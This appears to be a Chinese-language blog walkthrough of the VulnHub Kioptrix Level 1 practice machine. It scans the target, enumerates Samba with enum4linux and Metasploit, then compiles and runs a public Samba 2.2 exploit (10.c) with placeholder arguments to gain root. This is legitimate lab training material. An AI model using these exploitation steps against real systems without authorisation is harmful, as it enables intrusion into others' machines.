Kioptrix Level 1 (Linux)靶机
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
目标
-得到root
*如果要下载来玩建议不要看, 因为剧透了
1. 打开你的Kali和靶机(Kioptrix Level 1)
那么这次靶机比较特殊必须使用VMaware来运行Kioptrix Leve1至于设定只需要将network设定成Bridged:Connected directly to the pyhsical network就可以了.
2. 使用netdiscover识别靶机. 因为是Vmware运行的所以我觉得是这个.
3. 使用Zenmap扫描靶机看有什么服务端口和确定是不是靶机.
4. 打开了很多端口但我就选 80端口的Apache httpd 1.3.20看看. searchsploit没有这个漏洞
5.但是google查到有
6. 那么当然是查看github的....... 文件名我就不写出来了. 再来就是根据它的说明来运行就可以了.
7. 那么把它下载下来.
8. 安装需要的配件.
9. 去到刚刚下载好的脚本
然后需要编译它才能运行
#gcc -o [输出文件名] [XXX.c] -lcrypto
然后运行它
#./[输出文件名] [payload码] [靶机IP] -c 40
*可以使用命令#./[输出文件名] 查看可以使用的payload信息.
10. 但是我运行了几次和排查我并没有得到shell.....
11. 那么就用enum4linux扫描看看, 发现运行着Samba服务但得不到Samba版本.
12. 发现可以匿名登入
13. 那么就尝试浏览看看, 成功登入了但还是没有发现Samba版本.
14. 那么就打开Meterspolit运行查看一Samba版本的payload.
打开meterspolit #msfconsole
用smb_version Payload >use auxiliary/scanner/smb/smb_version
查看配置信息 >info
15. 填入靶机的IP然后直接运行, 就得到了Samba版本
Samba 2.2版本.
16. 使用searchsploit查看一下能调用的漏洞, 然后我就选择用10c的payload因为他是支持Linux和可以远程代码
17.复制10.c到/root/文件夹下.
18. 因为它是.c文件需要重新编译才能运行
#gcc 10.c -o[输出文件名]
然后查看参数 #./[输出文件名]
19. 填入需要的信息并运行你的payload.
#./[输出文件名] -b=[平台] -c [Kali IP] [靶机IP]
运行就得到root权限了.
20. 不相信所以再确定一下, 确实是root.
感谢阅读.
Kioptrix Level 1 (#1)
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment